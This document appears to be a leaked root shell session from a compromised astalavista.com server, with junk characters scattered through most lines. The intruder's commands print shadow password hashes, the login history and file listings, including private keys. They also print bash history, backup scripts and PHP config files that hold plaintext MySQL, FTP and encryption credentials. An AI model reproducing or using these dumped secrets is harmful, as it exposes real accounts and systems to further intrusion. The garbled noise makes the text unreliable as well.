5 o, T) x% A- D j( @# xjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::! Q9 X% z, a7 V( p/ X
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! l6 L9 ~2 S1 c! c
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::' T0 u- q1 n8 g, p2 _
4 N3 f- _/ D8 u
sh-3.2# cat /etc/motd
# }/ p1 y# E. }5 r#####################################################
5 Y4 J( r3 ^( v+ t! ^/ J% ~#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #0 o$ \/ @2 x6 S- d H
# |__| [__ | |__| | |__| | | | [__ | |__| #
! n1 L+ W* \$ x& }0 m# | | ___] | | | |___ | | \/ | ___] | | | #* W3 y7 J9 Z5 t# w0 y
# #
0 g+ E. h7 \2 ^9 a#####################################################
! J2 \: {( P2 S9 }# #
4 ~ k% k$ m# \8 N I! R* {2 n# Admin Contact - 链接标记support@secureservertech.com #: e% _+ b+ u9 M* P9 }* R
# #1 m9 {2 P7 m$ V
# Available ShortCuts #
, P1 @9 Y+ V8 t% D, I- p H# #0 A k1 J0 Z; Z( O$ V: }
# nst - list active connections #
; Z! q+ y6 ?2 _* F: h3 U9 A# ddos - shows how many times each ip is connected #7 n; v' |+ r, g9 A0 L( J
# ltr - restart the webserver #& e9 }' S. V, ~9 S
# phpc - edit the php config file #
4 _/ k- i- B- u/ a* }# htc - edit the webserver configuration file #
/ P" Q6 o& ~7 z' I; b6 _# up - uptime #
5 p3 z- M( b- v& I# etd - edit the motd of the day file #
0 u, p& ~" R' E* q8 @# htr - start and restart apache if needed #- N# T; l) t A$ I
# syng - shows active SYN_RECV connections #
0 d/ _! a0 g+ s7 \# synd - syn flood blocker - “synd -h” for usage #
7 E' o- w3 F9 W1 K! G* f#####################################################3 X$ u [; M- v6 l/ N+ k
# NOTES: #. p5 o$ @, \2 Q' {
# Last Upgrade - 12-08-2008 by JF #
. H3 }" t* D3 }: t# My.cnf/Mysql Optimization - 1-28-09 #
1 g" j. ?7 |* A- |# #" X H) ` o; S, L7 s0 I9 V
# #
# v' A' z1 c' F( q# b# #
/ }1 I( N k% `) I! B+ K2 S#####################################################
- o: r2 F% h) `+ J
8 Y' u: f4 \6 k7 M) w% ?sh-3.2# lastlog | grep -v Never' J' W' Y6 l. y% s* p
Username Port From Latest; W/ _( E2 ?/ L, a
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009+ \1 M. {8 @. N; v" P' b
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008. o& k2 K2 P+ T9 ^% t2 |) `
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20099 p) L* S9 m) ^6 ]& f5 U
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20095 o1 i# c! ^( v
3 j/ t R! g4 x3 {" Fsh-3.2# ls -la
A4 E* J' l9 u: N4 }0 j! H5 y/ O( ltotal 4533766 s5 g' w% R' I& I& [
drwxr-x— 15 root root 4096 Jun 4 08:40 .
5 E Z- Y3 p: C2 w7 O; }drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..& V" E8 h- A; p" @1 o0 u* s
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
% k$ w( e7 a, G) m: v5 S: {-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
: m. } Q7 D7 K. o-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
# w+ Y0 u1 s: N3 o0 s-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
/ \8 h3 z6 e: ]! R-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
4 S& O9 d S# z9 @! O% |) ?& @-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
$ [( e9 E7 A7 Q4 B1 y) Z$ T-rwx—— 1 root root 1899 Oct 28 2007 bk.sh$ A6 L. A- {; D; u
-rw-r–r– 1 root root 1327 Nov 29 2007 cert5 u9 Y# q4 C6 m+ C, v$ l
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql1 h6 ^" ~1 s/ H2 C z. d
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
j/ r* o( d' N0 G$ _# U-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
& S6 S% v$ J+ l) v% p-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql( s X6 J2 V8 Q) L, V1 u
drwx—— 2 root root 4096 Oct 28 2007 .elinks
+ t8 H1 D9 ]0 b8 k; s W( \0 zdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
$ {: V- j0 w! [. V' c) W; P-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
' ^; K/ e% s4 b" h9 B-rw——- 1 root root 0 Apr 16 13:19 .history
& s$ _6 x2 x) E1 \ C-rw-r–r– 1 root root 16095 Sep 11 2007 install.log, w' p9 U! A8 ^# r5 E1 x* Z
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog, u8 \9 _: R" x
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
- p6 U+ w |/ {/ U% t; U-rw——- 1 root root 35 Jun 2 14:23 .lesshst" T/ l# u- M! Q9 x6 j- b0 ^
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp" D) n( x! c* A X' ]1 ^
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
9 l3 s. @4 R& u9 p. [8 x-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
2 i3 p ~1 r! q$ A I; D! S8 T-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
9 u4 t* P' ^$ Y* n. l-rwx—— 1 root root 760 Sep 18 2008 lp
) k1 c+ l$ h8 c1 Y# K7 mdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1 w! M( m7 w% c+ l& b0 U! s
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz- t! \+ V7 ^- Q: o4 {
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
9 n* V$ i8 S3 V' g' _- i/ ?! zdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9# [4 p( }! d& }; N
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
" S6 s6 d* R: s: \9 s- Pdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
' A7 [. n6 K" K1 D-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz5 d! q1 l/ J3 {7 ?1 [+ N, Z/ Y
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
) {' Z) k: V8 Z-rw——- 1 root root 41 Oct 19 2007 .my.cnf
! |! j, {# ]# c4 ?- {-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
) l n3 b: y4 N# k7 l, C" C/ c-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ n2 o4 ?* O: u
-rw——- 1 root root 41 May 20 2008 .mytop
& s0 d0 h" X }/ Cdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
w! `& R/ c6 C4 H+ @% L% w-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz7 n4 A7 T: X4 q5 \
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp' ?8 \; o! W& A" Y
-rw——- 1 root root 1462 Sep 21 2007 opt.php
2 f7 }3 K K) I! z9 _0 ?-rw-r–r– 1 root root 3371 Sep 22 2007 p/ F( n* Y7 ^: U M
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
' N( G' J7 K c; n1 s5 p7 W-rw——- 1 root root 1024 Feb 3 21:32 .rnd
3 t4 z# Q9 {: P# w4 v: G: n; _-rw-r–r– 1 root root 716 Nov 28 2007 server.csr- d& v2 ~6 X4 G! b$ Z
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
5 K$ ]5 \+ }" t) q% fdrwx—— 2 root root 4096 Oct 10 2008 .ssh' s" i: y4 J4 F9 d& }6 p5 s
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat7 }& i2 w/ M7 p8 g5 ~' y6 @* C$ N5 v
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc1 T5 V3 \, C5 a
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
5 X8 r9 I$ d( {, \! _8 Y |. k-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
, I( B6 H9 A1 v5 L4 g0 Q3 `drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
r+ V. v: {8 @, \6 h-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
8 z9 \/ z9 a; k% l1 n) {4 | Tdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
- f4 Z+ `: i! f-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
. V5 C3 {& |; r4 N+ ~# `-rw——- 1 root root 12997 May 16 2008 .viminfo
`8 ~2 q' J# h7 u* x
, [0 u* R1 E- Q4 s* A8 B6 csh-3.2# cat .bash_history, [8 w3 ^- N% X( \
[snip]- `+ P& b) W9 s: T( f
wget cp4sst.com/sstlinux.tar.gz
/ n* H+ r3 q3 ?2 Ltar zxvf sstlinux.tar.gz0 p# Q- [. m2 S( ^8 S0 \6 w
cd linux-2.6.27.10
. E0 a9 Y% }1 i! W$ Ksh install.sh
3 |/ {" O0 F9 j# ]0 gmake bzImage ; make modules ; make modules_install ; make install
: c m' T4 ]5 w" o$ V4 fmake clean
* k! T7 v4 ~; m6 J- ~. U% _service mysqld restart6 o) S5 r$ r" o" N, ]
[snip]
7 g( P. [* U0 l/ k& \1 xcd /usr/sbin/
# F$ N" Z" \% {2 x$ c. Schmod 4777 traceroute
0 R; N3 U6 z1 o( t- q3 j! dchmod 4777 ping! P+ B) c& P) i. Z1 u" ?
traceroute -I 链接标记[url]www.astalavista.ch[/url]
9 \" U" b; Z* Z' C2 u ^6 _[snip]
& d1 L9 c/ P. ^- c- Avi /etc/csf/csf.conf! [! ^% S! X3 m1 x9 f
traceroute google.ch
% A2 ]/ I& v5 A/ }; J, e- \service csf restart
9 V5 ?& U; R: k0 m. z4 c; Ftracert google.ch
( c; d3 v' ?" r. q' _service csf restart2 W1 Y/ X1 J( @, d7 k
traceroute 链接标记[url]www.google.ch[/url]
! Y# q4 P" ?4 q; w* p' } Stracert 链接标记[url]www.google.ch[/url]
+ Q3 @4 r e/ G ktraceroute 链接标记[url]www.google.ch[/url]- u! a+ P4 u8 y) Z( M# c
locate traceroute+ x2 C: _2 S3 U% w8 R& t8 P
chown 4755 /bin/traceroute8 \ j6 y7 P9 x1 q
chown 4777 /bin/traceroute
3 y& b# w7 X" a/ b+ s4 Zlocate ping. y+ A! B( {# F
chown 4755 /bin/ping0 E7 A. U! ?6 ^1 k, k7 ~
chown 4777 /bin/ping
1 F K2 H: K7 mcd /bin/
( q1 Z* m1 o9 P: x cls -ali | grep ping0 r6 _6 a4 h- ?0 |# Z
chown root ping3 ~5 r+ a/ P A; N/ w' G! ^0 K) b) Y
chmod 4755 ping
1 T. D: c4 o$ L1 a9 \ls -ali | grep traceroute) X0 ?- F* z; q% Q
chown root traceroute; X; f" v; `' ~8 k1 R( E: t
chmod 4755 traceroute
! c- z4 s# `+ n- z0 bls -ali | grep traceroute
$ Y1 ~2 _; m* S8 @5 H/ [* Itraceroute -I 链接标记[url]www.google.ch[/url]" n/ e* s) e; _7 e% W
traceroute 链接标记[url]www.google.ch[/url]
/ z) h, W; E: b4 h- _# Uwhois pmsantos.ch
8 j, B: N0 U d8 U1 m8 x[snip]3 B$ P- }$ Y0 R' {4 R7 ^7 d
mysql -h com_contrexx2_live < /root/defaultp_ports.sql) o1 y; [: ~9 }, y3 \
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql# v" a% b" ~5 E I
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
7 c) ^% k0 e& a# Y. Q# G8 rmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
, e% ~" [" D3 E) F3 Mtop
2 B* \; e- n+ c. b( Sping ssth.ch
4 ^ b4 G* O1 mping asdlkfaljgasd???ljg???lasj.ch! \$ n, q- |+ M5 {! Q5 O: }2 u
ping asdlkfaljgasdlasj.ch
0 D- @0 K& w* h" ]7 `ping 链接标记[url]www.ssth.ch[/url]
1 F0 B2 d- e0 ~# d! cping ssth.ch6 y5 f/ m, G( I# P7 I7 r; D
nslookup 链接标记[url]www.google.ch[/url]1 a1 ?( s& C r2 R* r
nslookup 链接标记[url]www.ssth.ch[/url]. k. J! B+ a/ P; S( v
man nslookup
- s- r# M# Y& pping 链接标记[url]www.google.ch[/url]
- V3 X% D- b* n) Z! X7 Wnslookup 链接标记[url]www.google.ch[/url]
9 w; p3 N: {5 q6 @+ q4 onslookup 链接标记[url]www.google.ch[/url]1 z+ Y P9 K: y* |4 F
nslookup salfjasdlf.ch( \+ L5 |* p6 _$ w) [% f
[snip]
! X* b1 t! Q) }! zopenssl passwd -1 sadf
/ U5 w* o& V3 L% x; _openssl passwd -1 5cZNHstdTy+ V8 w0 G' l3 t
mysql" {/ J- n' E$ G1 s' o
mysql
; f t6 L' |" ~locate proftp
6 Q5 I" {. u, vvi /etc/proftpd.passwd
0 [! \: [- O: [2 v4 C( `1 [service proftpd restart0 b) C0 H% [1 t$ Z: l* F8 }
locate proftpd.conf
; f* t" x3 _4 O! v; Y1 [! Uvi /etc/proftpd.conf
2 R) f, ?7 l1 m8 P, Hvi /etc/proftpd.passwd* G, ]1 H3 U1 |, z7 i
service proftpd restart9 _; H7 z3 s# X) {) ?" a
[snip]
2 S& h; B/ r: z$ I( ]- Z8 l/bin/sh /home/com/backup_system/backup.sh
/ g2 n, l/ g: Ttar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin9 N) O! k* Q5 K( q2 ]
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql) A4 Y0 g) Q4 d3 Z/ `
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql& J& z8 Y: L! k4 b5 c$ r
ls -ali
8 W4 d2 m a4 S# _2 K; ^) M' emysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
+ V, a% K0 V: ~6 n5 k6 C! } Rmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql+ S/ M$ v; G. X A
crontab -l
% _' u4 M) {% }+ rcrontab -l
' ]; T4 ^8 z& n* v* bphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
6 C0 v6 n8 ^& R7 |* T0 P/home/com/public_html/modifications/cronjobs/exploits.sh7 @! N. C, [0 a5 F" C9 ]* j6 A+ i
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
. l: Y7 z) p/ |$ itar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz. m0 R6 Y# l# Z% X( ?- i
cd lsws-4.0.3
' f/ p* h7 V5 Ash install.sh' k, H' e" M$ D
uptime
1 t/ Z: {6 Q, U* Phdparm -tt /dev/sda6 n& y3 t4 X* P* T y( [2 ]
iostat9 a9 Q. ~- j+ @; ], G5 o( g! G
yum install iostat6 Y2 a% V( n; N: C/ d) u; Q
iostat
8 v. s: M0 N+ dwhereis iostat# a3 v6 s9 t- z; {2 |# d
yjm clean all9 i" n& A3 k a7 v% Q
yum clean all ; yum -y update
% O2 Q; Z/ a6 Y, miostat
4 h* g& _0 U( }* s7 u' {4 jyum install systat0 l% O* s J; w7 u
rpm -qa | grep iostat
5 G1 {$ x' i" b6 _' ^rpm -qa | grep sysstat
1 a) z7 L) U0 ~) L# \# Qrpm -qa | grep systat+ _- `4 m6 w2 Y3 }3 L4 o
dmesg -c; P- |; I7 i/ P5 W8 a+ n( A
sysctl -p6 q1 O# E6 d. F4 {& v5 e- {/ V$ W
uname -r
; D% {/ ` s. m* mcd /usr/src& W. `9 M; _# n2 e
wget nix101.com/kernels/sstlinux.tar.gz2 D6 d% N6 _, ]' {5 J
shutdown -r now, g9 P0 Z4 u) L" D) u
nano -w /boot/grub/grub.conf
5 J `4 Q! O7 W, z% u# G, q
+ O# {7 V/ d6 S$ Ysh-3.2# cat .my.cnf
- Z/ f8 E# d, L1 Q; A+ B. B[client]
& {' I a) Y/ F& q1 w. Q( f% nuser=da_admin
* }! z9 t+ f! Rpassword=X9dctmRH
# d% d" K; V0 l& Z+ f4 x1 i9 b; C* ]7 r& ^5 d4 D: Q& |
sh-3.2# cat /home/com/backup_system/backup.sh. A" J: `5 |% S8 g) c
#!/bin/sh' T7 U; N7 I* f
#####################################################################0 ~+ a# K) T( P9 @' X
# #, d8 R6 _! c- r% m V
# incremental backup for astalavista.com #: K6 u5 m/ j$ N$ m* S+ c/ s- O
# #
: O; ?- H, B0 Q8 B2 \$ M% c+ s# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
$ [6 N* r! f6 h E# #7 K/ B, J, G& N _( S2 T) C
#####################################################################3 f* C- D. C# {& N9 x
[snip]; \$ c% l! E |" H) l
PROG_DIR=”/home/com/backup_system”;
2 K! F/ O- [3 s. X( VBACKUP_DIR=”/home/com/backups”;
4 R* N5 j& R' wDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;- ?7 ]. E U/ r6 K# Y$ u$ X: s9 L
# ftp for synology backup server
6 [3 x, H6 |4 }) ?8 z! w8 OFTP_HOST=”212.254.194.163″;
; {9 |) e6 t: {2 kFTP_PORT=”21″;
9 T0 _9 P4 |0 H3 c; @+ sFTP_USER=”astalavista.com”;1 E/ H6 P& V) v4 F1 S
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;/ N/ f) O7 u: ~0 }
FTP_DIR=”/astalavista.com”;
* k+ r! m2 a6 Z1 |5 J# database. e- s4 z0 z T, I$ o
DB_HOST=”localhost”;
' H6 A* W" T2 XDB_USER=”contrexxuser2″;
9 l- _: W% C8 H) ?. A' P ^# v/ e" ]& \DB_PASS=”0fEYNZgXz1pKe”;
! n: G/ m' w+ M F3 p7 v bDB_DATABASE1=”com_contrexx2_live”;
3 v2 f% r0 @' C* `- ODB_DATABASE2=”com_contrexx2″;
# K$ m! i5 z: P: ~[snip]
: `! \* E0 ]9 n* ~" Jftp -in $FTP_HOST $FTP_PORT <<EOF: C6 t3 \. B, N$ v3 y! ?
quote USER $FTP_USER
3 p5 M" s0 p9 yquote PASS $FTP_PASS' e! R0 q& S2 v& u8 w
cd $FTP_DIR
' @# ]$ t; v( [put $DB_FULLNAME-SQL_Dump.tar9 ?, p- k; |# C$ m& o: L
put $BACKUP_FULLNAME-Public_HTML.tar
0 u0 g3 o9 b, X e7 dclose: g* e: a1 C3 e" q
bye
9 G+ f7 _, T' v+ i3 CEOF
$ N2 q2 G) D7 l, @! O v0 V! u; e3 H( f x7 }. x# c- @
sh-3.2# cd /home- M( F7 O) v: U; S5 e( F1 F
sh-3.2# ls -la
: [1 { g4 O# _ W" t+ Y' [total 120
+ ]8 _+ ^. O& ]+ ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
4 d* j7 e, g' G5 T; Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! n6 v6 a2 @4 |8 q
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
0 t, V! Z4 z2 Y. i& E' U' p5 n-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
# W$ f# p* c4 K/ D-rw——- 1 root root 8192 Jun 3 02:45 aquota.user' \6 i7 c, W% x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet8 ?7 y% k5 d! x6 \1 W
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup) Z7 g0 k- \9 n2 s) ?
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141614 D, S( {1 Q$ u! p' H, y
drwx–x–x 10 com com 4096 Apr 28 12:40 com
5 u- k4 v7 G8 ?drwxr-xr-x 2 root root 4096 May 17 2007 ftp
9 p9 N5 L- v$ K7 v6 Udrwx—— 3 jon jon 4096 Sep 21 2007 jon7 Y5 B- S' g6 d A
drwx—— 2 root root 16384 Sep 11 2007 lost+found
, }4 S) F8 u. x, G3 |8 \drwxr-xr-x 2 root root 4096 Sep 14 2007 my3 w' O: G3 B- w. M
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& \4 J! z9 Y1 a* Hdrwx—— 2 jon jon 4096 Sep 15 2007 test1 q# G6 Q0 i7 P* C! Y! b
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp, i8 R( b2 L9 |+ T$ U
& [) G( Y! b q/ s4 tsh-3.2# cd admin C* a& Z9 j+ r2 C1 s" a
sh-3.2# ls -la
% D9 G5 o6 U3 @7 i. H& Stotal 1735896
) Z0 ^& o& A, E$ y; n# v1 u0 g# w8 b Kdrwx–x–x 9 admin admin 4096 Nov 28 2007 .& y& f1 A" o3 ` s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
. _1 i" m! W% R. A9 k) q/ cdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
0 p( X6 i# W& R" M8 ?: y; o; gdrwx—— 2 admin admin 4096 Sep 28 2007 backups1 ~% B1 W8 T+ P$ \/ m( ~
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
- }# } q4 x( T, W" w7 P% F-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout6 }9 z1 @4 D! G- X9 A3 h
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile S) M: G( S) I- u
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc- }7 }5 w1 U3 M- @. v0 z2 E
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
9 o$ {; I# n7 Pdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains. P2 k) B! a. l4 L! G' b7 W% f7 q
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
+ Y8 q$ m u9 s9 D# i4 `+ L-rw-r–r– 1 root root 24 Sep 21 2007 info.php4 J3 |4 ?$ K l! _( c& k0 X
drwx—— 2 admin admin 4096 Sep 21 2007 mail f9 d2 h6 j% l; @: C, F& R
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
- I' \1 ]+ Z' m. o! C2 X. q-rw-r–r– 1 root root 887 Nov 28 2007 server.key/ a( r( F% M7 \& D7 ?; I
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow7 e$ K' Q, i/ [! p1 f7 t
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz7 \$ k, C& [. i& ~9 s
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
8 H- P& s' V1 @5 E+ ~0 e1 t9 t
$ J) l4 g. i! W B9 e6 V& w) Rsh-3.2# ..' U* o0 h7 N9 c- V# d. s z9 b* F
sh-3.2# cd jon. U2 k7 ]; d* s' s/ C4 _* q3 J
sh-3.2# ls -la, F2 K% A* }- e9 n+ [+ U
total 36
9 y6 ^0 f6 l: i) O: }" @drwx—— 3 jon jon 4096 Sep 21 2007 ., I, z0 o3 S) T$ ?1 ^
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
. b) f) }- H' W1 ?6 X7 \-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
, h, z4 w5 [% Y& S, J-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
" c% O& Y, ~' s5 k8 s) x) ` e% ^; l-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
: B3 W. r& k f i$ u3 c-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
2 r+ F1 V+ u& Q5 h0 ]6 B# V. _-rw-r–r– 1 root root 24 Sep 21 2007 info.php
& m& s# b# [7 x7 h) w0 o+ l. Edrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
A. B/ g1 N5 ]% W8 O* B( `6 g1 B# C
sh-3.2# cd ..
& Z7 O5 p4 X1 b* K% q8 ish-3.2# cd test
6 V( Q% e0 E+ C- rsh-3.2# ls -la, g0 a- `1 x4 E J. d4 x
total 482 K9 |" Y, N- d/ D8 b0 B8 T" |
drwx—— 2 jon jon 4096 Sep 15 2007 .+ d- S8 B" K) I5 Y. i
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: \* f( H% f1 w5 r
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history6 X6 N" ^# o) O8 } [+ n6 x9 V% ~
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
8 B* {: x Y4 t) q" j- w V-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
6 d6 y4 `: Z; z# e2 g2 N% E-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
& Z; N) E+ Q! \+ Gsh-3.2# cat .bash_history
' ^# F' B, D9 r" v/usr/bin/mysqladmin -u root password PoliuJhytg676 ?9 U+ G7 n* B
. j# U) U4 t: L/ }7 O) F/ w
sh-3.2# cd ..
7 y- y( S" h$ N: z& ^9 Ish-3.2# cd astanet U; Q% A- y' e+ b; R1 c& A
sh-3.2# ls -la0 D3 b7 Q" E& _; V. K
total 52. O9 l# ~; C: d! ~) j2 x# m
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
3 O1 K: r6 ]8 f# V2 G3 T7 t, xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- `& }' n2 L$ I, o9 e$ {0 gdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth6 Z9 s1 B: ~1 ^/ s
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
, Q5 ^, p. p& `3 @& `0 t5 \-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 {5 y; Z/ ^' Z5 p! M$ [$ _. `" ?
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile% k/ @: b6 }- K! }
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc9 O0 j% f& |# A$ y/ z, T
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains" E' P# N4 T" k: S6 d, D/ i
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap- B4 Z6 Y; s; V z: U
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
1 _% G3 x0 g4 _$ W6 e1 {-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
( f/ K9 c# D" R; Nlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html5 G7 K) q# ^: x. ]2 D7 d1 ^
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow% |+ _# S, E4 Q; K. L5 c" @
9 @! h9 g2 |! E7 }! f; c; D( Z
sh-3.2# cd auth/
5 O9 e0 [ n; P% s2 bsh-3.2# ls -la3 W4 Y, h/ W! ]* W
total 288 r4 T$ d6 C' R; f# z9 B) [) R
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
. F* y( e: D2 a0 udrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
: U* y! c1 ^& r( [, h-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
3 w8 o1 ~; l* k/ W2 @; |-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
6 \: C4 O3 J4 g' x! q; t-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd# |- }: j8 B J! J; I. a3 v/ F
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
7 v2 D ]+ o8 w3 b) L-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
" n: w/ e# Z# x2 U. k; Z" t: D5 b0 W j6 B
sh-3.2# cat hackercontest.config.inc.php6 w* S2 a5 p# `
<?PHP
2 Q& ]: k# Z2 D3 Z8 E// Variabeln f?r Verbindung zur Datenbank //8 t$ x& N' h( N: N) R/ d
$conxHost = ‘localhost’; // MySQL hostname
9 h! ?# V: c, V, ^% @9 V$conxUser = ‘hackercontest’; // MySQL user
0 P4 w+ o7 j8 O; f$conxPassword = ‘K6m@7dUc’; // MySQL password
6 A9 H* x. w. H$ M1 U4 c! x$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
" y/ O3 N( h3 ]2 b6 W0 z0 O?>
& \% w- j' C8 L' Ish-3.2# cat hosting.config.inc.php
6 j* ?) c2 k' o! v<?PHP8 ]- `" M# C+ I
// Variabeln f?r Verbindung zur Datenbank //' Y& u$ V! |0 n4 a$ t! `% u
$conxHost = ‘localhost’; // MySQL hostname
0 p1 Y/ _) A, I" x9 {$conxUser = ‘hostinguser’; // MySQL user# U/ } S9 Y: x9 {1 [$ S
$conxPassword = ‘cXvB3981′; // MySQL password& j" \% q1 D( p
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
& F [& X# E0 G8 [?>$ Z) F+ ~, `1 T) ^0 O
) t8 d! G A* m/ |7 msh-3.2# cd ..
' R' [% g' I( B' P' ^8 Ish-3.2# cd com$ f5 W8 d5 ^6 {& R2 H7 R
sh-3.2# ls -la
